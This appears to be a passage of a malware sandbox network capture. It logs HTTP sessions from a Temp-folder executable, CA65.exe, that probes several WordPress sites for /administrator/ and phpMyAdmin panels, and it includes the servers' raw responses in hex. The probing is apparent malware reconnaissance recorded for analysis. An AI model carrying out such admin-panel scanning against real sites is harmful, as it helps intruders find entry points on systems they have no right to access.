2023-12-22 20:14:55 UTC	182	OUT	GET /administrator/index.php HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:56 UTC	337	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:56 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://cicfl.com/administrator/ Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	60018	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	164	OUT	GET / HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:56 UTC	934	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:14:56 GMT Last-Modified: Fri, 22 Dec 2023 20:11:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding,User-Agent Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EJg%2FcLe154hoK%2F%2BGjEy225mKZFtvFDSoQHOcindgs1N4S4zt48gT2dk7SLBX%2FZmcj9S1AqDxo9ZS0wRETXibB8o0X3zAbrY5WkGOB4IQfyGVTPxmtcHi7lhyyvNK1BzUjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08b0deda8db2-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:56 UTC	435	IN	Data Raw: 34 64 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e Data Ascii: 4dcb<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><script>(function(html){html.className = html.className.replace(/\bn
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 43 61 6e 6e 61 43 6c 65 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6c 6b 20 44 65 6c 74 61 2d 38 20 54 48 43 20 70 72 6f 64 75 63 74 73 20 61 74 20 75 6e 62 65 61 74 61 62 6c 65 20 70 72 69 63 65 73 2e 20 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 4f 69 6c 2c 20 44 38 20 56 61 70 65 73 2c 20 48 48 43 2c 20 54 48 43 2d 4f 2c 20 48 48 43 2d 4f 20 61 6e 64 20 6f 74 68 65 72 20 63 61 6e 6e 61 62 69 6e 6f 69 64 73 20 6f 6e 6c 69 6e 65 2e 20 53 68 6f 70 20 6e 6f 77 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 6c 6c 6f 77 2c 20 69 6e 64 65 78 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c 20 Data Ascii: CannaClear</title><meta name="description" content="Bulk Delta-8 THC products at unbeatable prices. Buy Delta 8 THC Oil, D8 Vapes, HHC, THC-O, HHC-O and other cannabinoids online. Shop now!" /><meta name="robots" content="follow, index, max-snippet:-1,
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 5f 64 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 30 2d 31 31 2d 30 35 45 53 54 30 37 3a 30 34 3a 34 37 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 79 61 3a 6f 76 73 3a 61 6c 6c 6f 77 5f 65 6d 62 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 7c 20 42 75 79 20 44 65 6c 74 61 2d 38 20 54 48 43 20 42 75 6c 6b 20 44 69 73 74 69 6c 6c 61 74 65 20 4f 6e 6c 69 6e 65 20 Data Ascii: _date" content="2020-11-05EST07:04:47-05:00" /><meta property="ya:ovs:allow_embed" content="false" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Buy Delta 8 THC \| Buy Delta-8 THC Bulk Distillate Online
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 69 64 3d 22 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 61 73 73 65 74 73 2f 63 73 73 2f 62 6c 6f 63 6b 73 2f 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: id="wc-authorize-net-cim-checkout-block-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/css/blocks/wc-authorize-net-cim-checkout-block.css?ver=1703001817" type="text/css" media="all"
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 3a 23 30 30 37 63 62 61 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 30 2c 31 32 34 2c 31 38 36 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 3a 23 30 30 36 62 61 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 2d 2d 72 67 62 3a 30 2c 31 30 37 2c 31 36 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f Data Ascii: t;}</style><style id="wp-block-library-inline-css" type="text/css">:root{--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,161;--wp-admin-theme-co
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 33 33 30 39 36 38 2c 23 33 31 63 64 63 66 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 30 32 30 33 38 31 2c 23 32 38 37 34 66 63 29 7d 2e 68 61 73 2d 72 65 67 75 6c 61 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 36 32 35 65 6d 7d 2e 68 61 73 2d 6e 6f 72 6d 61 6c 2d 66 6f 6e 74 Data Ascii: gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 Data Ascii: rder-right-color]){border-right-style:solid}html :where([style=border-bottom-color]){border-bottom-style:solid}html :where([style=border-left-color]){border-left-style:solid}html :where([style=border-width]){border-style:solid}html :where([style=borde
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 2f 63 73 73 2f 77 74 2d 69 6d 70 6f 72 74 2d 65 78 70 6f 72 74 2d 66 6f 72 2d 77 6f 6f 2d 70 75 62 6c 69 63 2e 63 73 73 3f 76 65 72 3d 31 2e 32 2e 34 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 77 73 2d 69 63 6f 6e 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 72 65 77 61 72 64 73 2f 61 73 73 65 74 73 2f 6c 77 73 2d 61 64 6d 69 6e 70 61 6e 65 6c 2f 73 74 79 6c 69 6e 67 2f 63 73 Data Ascii: /css/wt-import-export-for-woo-public.css?ver=1.2.4" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="lws-icons-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woorewards/assets/lws-adminpanel/styling/cs
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 66 6f 72 6d 20 2e 6d 6e 6d 5f 69 74 65 6d 20 2e 62 6f 78 2d 74 65 78 74 20 2e 71 75 61 6e 74 69 74 79 20 2e 62 75 74 74 6f 6e 20 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 20 7d 0a 09 09 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 5b 64 61 74 61 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 5d 3a 6e 6f 74 28 2e 68 61 73 2d 74 72 61 6e 73 70 61 72 65 6e 63 79 29 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 Data Ascii: form .mnm_item .box-text .quantity .button { margin-top: 0; }</style><style id="dominant-color-styles-inline-css" type="text/css">img[data-dominant-color]:not(.has-transparency) { background-color: var(--dominant-color); }</style><link rel="styles
2023-12-22 20:14:56 UTC	1369	IN	Data Raw: 2d 6d 69 78 2d 61 6e 64 2d 6d 61 74 63 68 2d 70 72 6f 64 75 63 74 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2f 62 6c 6f 63 6b 73 2f 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 63 2d 70 62 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 Data Ascii: -mix-and-match-products/assets/css/frontend/blocks/checkout-blocks.css?ver=1703001817" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="wc-pb-checkout-blocks-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plug

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	60409	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:56 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	981	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IXDu7dwjEBrKhVF%2BGQNi3zEZWHQTLbwMO8TC%2FnO5FXOUwpx2f9NmKv9nXjO6mPYaIEMEhfamltTRfovLbS%2FeLRDS4TcO2LnUn%2BGqcn%2FrPZLXvilCPMOP6X1rw7Dg4YiQYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08b4395a5c75-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	60698	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:56 UTC	329	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:57 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_S0DalJIlIBSjUCP4sHqYJYbOmxl/02yadRiVckidhAf6yJqlmx7Dd5RMCoiTc8NHdg/fGIPUEkHtXeZ6xNSgeg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:57 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	60688	50.31.65.5	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:56 UTC	230	OUT	GET /administrator/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://saltdelcolom.com/administrator/
2023-12-22 20:14:58 UTC	535	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:14:58 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:58 UTC	833	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 26 23 38 32 31 37 3b 68 61 20 74 72 6f 62 61 74 20 6c 61 20 70 c3 a0 67 69 6e 61 20 26 23 38 32 31 31 3b 20 53 61 6c 74 20 64 Data Ascii: 10000<!DOCTYPE html><html lang="ca"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No s’ha trobat la pgina – Salt d
2023-12-22 20:14:58 UTC	14994	IN	Data Raw: 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 32 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 Data Ascii: \/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/saltdelcolom.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.3"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 35 37 31 34 32 38 35 37 31 34 32 38 36 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 3b 7d 62 6f 64 79 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a Data Ascii: n,.elementor-button-wrapper .elementor-button:visited{color:rgba(0,0,0,0.58);}.elementor-button-wrapper .elementor-button{font-weight:600;font-size:12px;font-size:0.85714285714286rem;line-height:1em;letter-spacing:1px;}body .elementor-button.elementor-siz
2023-12-22 20:14:58 UTC	16384	IN	Data Raw: 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 Data Ascii: -global-color-0-color{color:var(--ast-global-color-0);}:root .wp-block-button .has-ast-global-color-0-background-color{background-color:var(--ast-global-color-0);}:root .has-ast-global-color-1-color{color:var(--ast-global-color-1);}:root .has-ast-global-c
